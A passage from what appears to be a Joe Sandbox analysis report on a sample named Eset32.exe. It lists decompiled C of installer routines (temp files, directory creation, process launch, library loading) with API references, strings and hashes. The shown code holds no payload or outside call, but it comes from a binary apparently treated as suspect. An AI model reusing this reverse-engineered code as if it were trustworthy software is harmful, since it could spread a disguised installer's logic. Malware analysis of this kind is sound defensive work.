					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004032EA(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406625(0x40b880);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x428145
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040521E(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x428145
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405D37(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

























                                                          0x004030e0
                                                          0x004030e4
                                                          0x004030e7
                                                          0x004030ec
                                                          0x004030ee
                                                          0x004030ee
                                                          0x004030f5
                                                          0x004030f9
                                                          0x004030fe
                                                          0x00403100
                                                          0x00403100
                                                          0x00403107
                                                          0x0040310c
                                                          0x00403117
                                                          0x00403117
                                                          0x00403129
                                                          0x004032d8
                                                          0x004032d8
                                                          0x00000000
                                                          0x0040312f
                                                          0x00403133
                                                          0x00403285
                                                          0x004032c8
                                                          0x004032ca
                                                          0x004032ca
                                                          0x004032d6
                                                          0x004032dd
                                                          0x004032e0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004032d6
                                                          0x0040328a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040328c
                                                          0x0040328f
                                                          0x00403292
                                                          0x00403295
                                                          0x00403297
                                                          0x00403297
                                                          0x004032a7
                                                          0x00000000
                                                          0x00000000
                                                          0x004032b5
                                                          0x0040327f
                                                          0x0040327f
                                                          0x004032da
                                                          0x004032da
                                                          0x00000000
                                                          0x004032da
                                                          0x004032b7
                                                          0x004032ba
                                                          0x004032c1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004032c3
                                                          0x00000000
                                                          0x0040328f
                                                          0x0040313f
                                                          0x00403141
                                                          0x00403148
                                                          0x0040314f
                                                          0x0040314f
                                                          0x00403156
                                                          0x0040315e
                                                          0x00403168
                                                          0x0040316d
                                                          0x00403175
                                                          0x0040317f
                                                          0x00403182
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403188
                                                          0x00403188
                                                          0x00403188
                                                          0x00403190
                                                          0x00403192
                                                          0x00403192
                                                          0x004031a3
                                                          0x00000000
                                                          0x00000000
                                                          0x004031a9
                                                          0x004031ac
                                                          0x004031b2
                                                          0x004031b8
                                                          0x004031b8
                                                          0x004031c3
                                                          0x004031c9
                                                          0x004031ce
                                                          0x004031d5
                                                          0x004031d8
                                                          0x00000000
                                                          0x00000000
                                                          0x004031de
                                                          0x004031e4
                                                          0x004031e6
                                                          0x004031ef
                                                          0x004031f1
                                                          0x0040321f
                                                          0x00403225
                                                          0x0040322e
                                                          0x00403233
                                                          0x00403233
                                                          0x00403238
                                                          0x00403273
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040323a
                                                          0x0040323e
                                                          0x00403255
                                                          0x0040325a
                                                          0x0040325d
                                                          0x00403260
                                                          0x00403263
                                                          0x00403267
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040326d
                                                          0x00403247
                                                          0x0040324e
                                                          0x00000000
                                                          0x00000000
                                                          0x00403250
                                                          0x00000000
                                                          0x00403250
                                                          0x00403238
                                                          0x0040327b
                                                          0x00000000
                                                          0x0040327b
                                                          0x00000000
                                                          0x00403188

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 551687249-2449383134
                                                          • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                          • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 471 405cbf-405cc9 472 405cca-405cf5 GetTickCount GetTempFileNameA 471->472 473 405d04-405d06 472->473 474 405cf7-405cf9 472->474 476 405cfe-405d01 473->476 474->472 475 405cfb 474->475 475->476
                                                          C-Code - Quality: 100%
                                                          			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                          0x00405cc3
                                                          0x00405cc9
                                                          0x00405cca
                                                          0x00405cca
                                                          0x00405ccf
                                                          0x00405cd0
                                                          0x00405cd3
                                                          0x00405cdd
                                                          0x00405cea
                                                          0x00405ced
                                                          0x00405cf5
                                                          0x00000000
                                                          0x00000000
                                                          0x00405cf9
                                                          0x00000000
                                                          0x00000000
                                                          0x00405cfb
                                                          0x00000000
                                                          0x00405cfb
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405CD3
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                          • nsa, xrefs: 00405CCA
                                                          • "C:\Users\user\Desktop\Eset32.exe" , xrefs: 00405CBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-346580152
                                                          • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                          • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 477 4015bb-4015ce call 402bce call 405b28 482 4015d0-4015e3 call 405aba 477->482 483 401624-401627 477->483 491 4015e5-4015e8 482->491 492 4015fb-4015fc call 405761 482->492 485 401652-4022e2 call 401423 483->485 486 401629-401644 call 401423 call 4060f7 SetCurrentDirectoryA 483->486 499 402a5a-402a69 485->499 486->499 502 40164a-40164d 486->502 491->492 496 4015ea-4015f1 call 40577e 491->496 498 401601-401603 492->498 496->492 507 4015f3-4015f9 call 4056e4 496->507 504 401605-40160a 498->504 505 40161a-401622 498->505 502->499 509 401617 504->509 510 40160c-401615 GetFileAttributesA 504->510 505->482 505->483 507->498 509->505 510->505 510->509
                                                          C-Code - Quality: 87%
                                                          			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B28(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405ABA(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405761(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056E4(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060F7("C:\\Users\\alfons\\AppData\\Roaming", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                          0x004015bb
                                                          0x004015c2
                                                          0x004015c5
                                                          0x004015ca
                                                          0x004015ce
                                                          0x004015d0
                                                          0x004015d8
                                                          0x004015da
                                                          0x004015dc
                                                          0x004015e0
                                                          0x004015e3
                                                          0x004015fb
                                                          0x004015fc
                                                          0x004015e5
                                                          0x004015e5
                                                          0x004015e8
                                                          0x00000000
                                                          0x004015f3
                                                          0x004015f4
                                                          0x004015f4
                                                          0x004015e8
                                                          0x00401603
                                                          0x0040160a
                                                          0x00401617
                                                          0x00401617
                                                          0x0040160c
                                                          0x0040160d
                                                          0x00401615
                                                          0x00000000
                                                          0x00000000
                                                          0x00401615
                                                          0x0040160a
                                                          0x0040161a
                                                          0x0040161d
                                                          0x0040161f
                                                          0x00401620
                                                          0x004015d0
                                                          0x00401627
                                                          0x00401652
                                                          0x004022dd
                                                          0x00401629
                                                          0x0040162b
                                                          0x00401636
                                                          0x0040163c
                                                          0x00401644
                                                          0x0040164a
                                                          0x0040164a
                                                          0x00401644
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                            • Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming,00000000,00000000,000000F0), ref: 0040163C
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00401631
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 1892508949-3453768385
                                                          • Opcode ID: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                          • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                          • Opcode Fuzzy Hash: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                          • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405796 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 513 405796-4057c7 CreateProcessA 514 4057d5-4057d6 513->514 515 4057c9-4057d2 CloseHandle 513->515 515->514
                                                          C-Code - Quality: 100%
                                                          			E00405796(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c098->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                          0x0040579f
                                                          0x004057bf
                                                          0x004057c7
                                                          0x004057cc
                                                          0x00000000
                                                          0x004057d2
                                                          0x004057d6

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                          • CloseHandle.KERNEL32(?), ref: 004057CC
                                                          Strings
                                                          • Error launching installer, xrefs: 004057A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                          • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 516 401389-40138e 517 4013fa-4013fc 516->517 518 401390-4013a0 517->518 519 4013fe 517->519 518->519 521 4013a2-4013a3 call 401434 518->521 520 401400-401401 519->520 523 4013a8-4013ad 521->523 524 401404-401409 523->524 525 4013af-4013b7 call 40136d 523->525 524->520 528 4013b9-4013bb 525->528 529 4013bd-4013c2 525->529 530 4013c4-4013c9 528->530 529->530 530->517 531 4013cb-4013f4 MulDiv SendMessageA 530->531 531->517
                                                          C-Code - Quality: 59%
                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
					}
				}
				return 0;
			}











                                                          0x0040138a
                                                          0x004013fa
                                                          0x0040139b
                                                          0x004013a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004013a2
                                                          0x004013a3
                                                          0x004013ad
                                                          0x00000000
                                                          0x00401404
                                                          0x004013b0
                                                          0x004013b7
                                                          0x004013bd
                                                          0x004013be
                                                          0x004013c0
                                                          0x004013c2
                                                          0x004013b9
                                                          0x004013b9
                                                          0x004013ba
                                                          0x004013ba
                                                          0x004013c9
                                                          0x004013cb
                                                          0x004013f4
                                                          0x004013f4
                                                          0x004013c9
                                                          0x00000000

                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32 ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                          • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406500 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 532 406500-40651a GetModuleHandleA 533 406526-406533 GetProcAddress 532->533 534 40651c-40651d call 406492 532->534 536 406537-406539 533->536 537 406522-406524 534->537 537->533 538 406535 537->538 538->536
                                                          C-Code - Quality: 100%
                                                          			E00406500(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E00406492(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                          0x00406508
                                                          0x0040650b
                                                          0x00406512
                                                          0x0040651a
                                                          0x00406526
                                                          0x00000000
                                                          0x0040652d
                                                          0x0040651d
                                                          0x00406524
                                                          0x00000000
                                                          0x00406535
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                            • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                            • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                          • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405C90 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 539 405c90-405cbc GetFileAttributesA CreateFileA
                                                          C-Code - Quality: 68%
                                                          			E00405C90(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                          0x00405c94
                                                          0x00405ca1
                                                          0x00405cb6
                                                          0x00405cbc

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405C94
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                          • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405C6B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 540 405c6b-405c7b GetFileAttributesA 541 405c8a-405c8d 540->541 542 405c7d-405c84 SetFileAttributesA 540->542 542->541
                                                          C-Code - Quality: 100%
                                                          			E00405C6B(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                          0x00405c70
                                                          0x00405c76
                                                          0x00405c7b
                                                          0x00405c84
                                                          0x00405c84
                                                          0x00405c8d

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
